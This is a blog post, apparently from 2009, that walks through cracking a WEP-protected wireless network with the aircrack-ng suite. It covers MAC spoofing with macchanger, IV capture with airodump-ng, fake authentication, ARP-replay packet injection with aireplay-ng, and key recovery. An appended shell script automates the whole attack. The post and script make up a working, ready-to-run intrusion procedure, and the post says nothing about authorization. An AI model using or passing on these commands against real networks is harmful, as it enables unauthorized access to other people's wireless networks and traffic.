IV Needle Injecting Tech into the Vein

2 Jun 2009

Cracking WEP

I've looked at several different methods for cracking WEP... this is what worked for me:

Because my onboard wireless NIC does not support packet injection, I used my wireless USB adapter to do this in BackTrack 4.

Set up your adapter: stop any monitor interface left over from a previous run, bring the card down, spoof its MAC, then put it into monitor mode. The spoofed MAC (00:11:22:33:44:55 here) is the client address you will hand to aireplay-ng with -h in the later steps, so the two must match:

Code:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

If airmon-ng reports that monitor mode was enabled on a new interface (for example mon0) instead of on wlan0, use that interface name in place of wlan0 in every command below.

Start Kismet from the command line and let it collect information. Find the WEP network you want to crack and record its channel, BSSID, and ESSID:

Code:

kismet

Open a new terminal session and plug the values you collected from Kismet into the command below. You may want to create and cd into a temporary directory first, because airodump-ng writes several files into the current working directory. The --ivs flag keeps only the initialization vectors, which is all aircrack-ng needs for WEP and keeps the capture file small:

Code:

airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs

Next, open another terminal session and perform a fake authentication (-1, with a reassociation delay of 0) against the access point. This makes the AP accept frames from your spoofed MAC; without it, the AP simply discards the packets you inject in the next step. The -h value must be the MAC you set with macchanger:

Code:

aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0

At this point open another terminal and start ARP request replay (-3). aireplay-ng waits for an ARP request from the network and re-injects it over and over; the AP answers every copy with a freshly encrypted frame, so the IV count in your airodump-ng window should climb much faster than it would from passive capture alone:

Code:

aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

The final step of the crack is simple. Point aircrack-ng at the .ivs file that airodump-ng created. If the file does not yet hold enough unique IVs, aircrack-ng keeps re-reading it as airodump-ng appends to it and retries until it can recover the WEP key. Note that airodump-ng adds a two-digit run counter to the prefix you gave with -w, so with -w wep_router the file is wep_router-01.ivs (check the exact name with ls):

Code:

aircrack-ng -s wep_router-01.ivs
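The four terminals above, combined into one script, as an added example that is not part of the original post. It assumes things the post does not state: aircrack-ng 1.x, where airodump-ng names its output PREFIX-01.ivs; an adapter that is already in monitor mode; and that the spoofed MAC in the script is the one given to macchanger in the setup step. The helper functions take explicit arguments so the command lines can be checked with DRY_RUN=1 before touching the radio.

```shell
#!/bin/sh
# wepcrack.sh: runs the four-terminal WEP procedure from this post from a
# single shell. Added example, not the original post's code. Assumptions
# that are not stated on the page: aircrack-ng 1.x (airodump-ng names its
# output PREFIX-01.ivs), the adapter is already in monitor mode, and the
# spoofed MAC below is the one handed to macchanger in the setup step.
#
# Usage: sh wepcrack.sh CHANNEL BSSID ESSID PREFIX [IFACE]
#        DRY_RUN=1 sh wepcrack.sh ...   prints the commands instead of running them

FAKE_MAC="00:11:22:33:44:55"   # must match macchanger --mac in the setup step

# Execute a command, or just print it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# A BSSID / client MAC is six colon-separated hex octets.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# 802.11b/g channels 1-14 (the band the hardware in this post was on).
valid_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# airodump-ng -w PREFIX --ivs writes PREFIX-01.ivs (then -02, ... on reruns).
ivs_file() {
    printf '%s-01.ivs\n' "$1"
}

# Step 1: capture IVs for one BSSID on one channel (long-running).
capture() {   # CHANNEL BSSID PREFIX IFACE
    run airodump-ng -c "$1" -w "$3" --bssid "$2" --ivs "$4"
}

# Step 2: fake-authenticate the spoofed MAC so the AP accepts its frames.
fake_auth() { # ESSID BSSID IFACE
    run aireplay-ng -1 0 -e "$1" -a "$2" -h "$FAKE_MAC" "$3"
}

# Step 3: ARP-request replay to generate fresh IVs quickly (long-running).
arp_replay() { # BSSID IFACE
    run aireplay-ng -3 -b "$1" -h "$FAKE_MAC" "$2"
}

# Step 4: recover the key from the collected IVs; -s also shows it as ASCII.
crack() {     # IVSFILE
    run aircrack-ng -s "$1"
}

main() {
    if [ $# -lt 4 ]; then
        echo "usage: $0 CHANNEL BSSID ESSID PREFIX [IFACE]" >&2; return 2
    fi
    ch=$1; bssid=$2; essid=$3; prefix=$4; iface=${5:-wlan0}
    valid_channel "$ch" || { echo "bad channel: $ch" >&2; return 2; }
    valid_mac "$bssid"  || { echo "bad BSSID: $bssid" >&2; return 2; }
    for t in airodump-ng aireplay-ng aircrack-ng; do
        command -v "$t" >/dev/null 2>&1 || { echo "missing tool: $t" >&2; return 1; }
    done
    # Stop the background capture/replay helpers however we exit.
    trap 'kill $cap_pid $rep_pid 2>/dev/null' EXIT INT TERM
    capture "$ch" "$bssid" "$prefix" "$iface" >/dev/null 2>&1 &
    cap_pid=$!
    sleep 5                                   # let airodump-ng settle on the channel
    fake_auth "$essid" "$bssid" "$iface"      # returns after the association attempt
    arp_replay "$bssid" "$iface" >/dev/null 2>&1 &
    rep_pid=$!
    sleep 10                                  # give the replay time to produce IVs
    crack "$(ivs_file "$prefix")"             # retries on its own as the file grows
}

# Only run the procedure when invoked with arguments, so the helpers above
# can be sourced or tested without touching the radio.
if [ $# -ge 1 ]; then
    main "$@"
fi
```

The validation runs before anything is transmitted, and the trap makes sure the airodump-ng and aireplay-ng helpers are killed when aircrack-ng finishes or you hit Ctrl-C, which is the part most easily forgotten when juggling four terminals by hand.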

This should do it... I'll tweak this as I go to make it better. Feel free to give feedback if you have suggestions or changes.
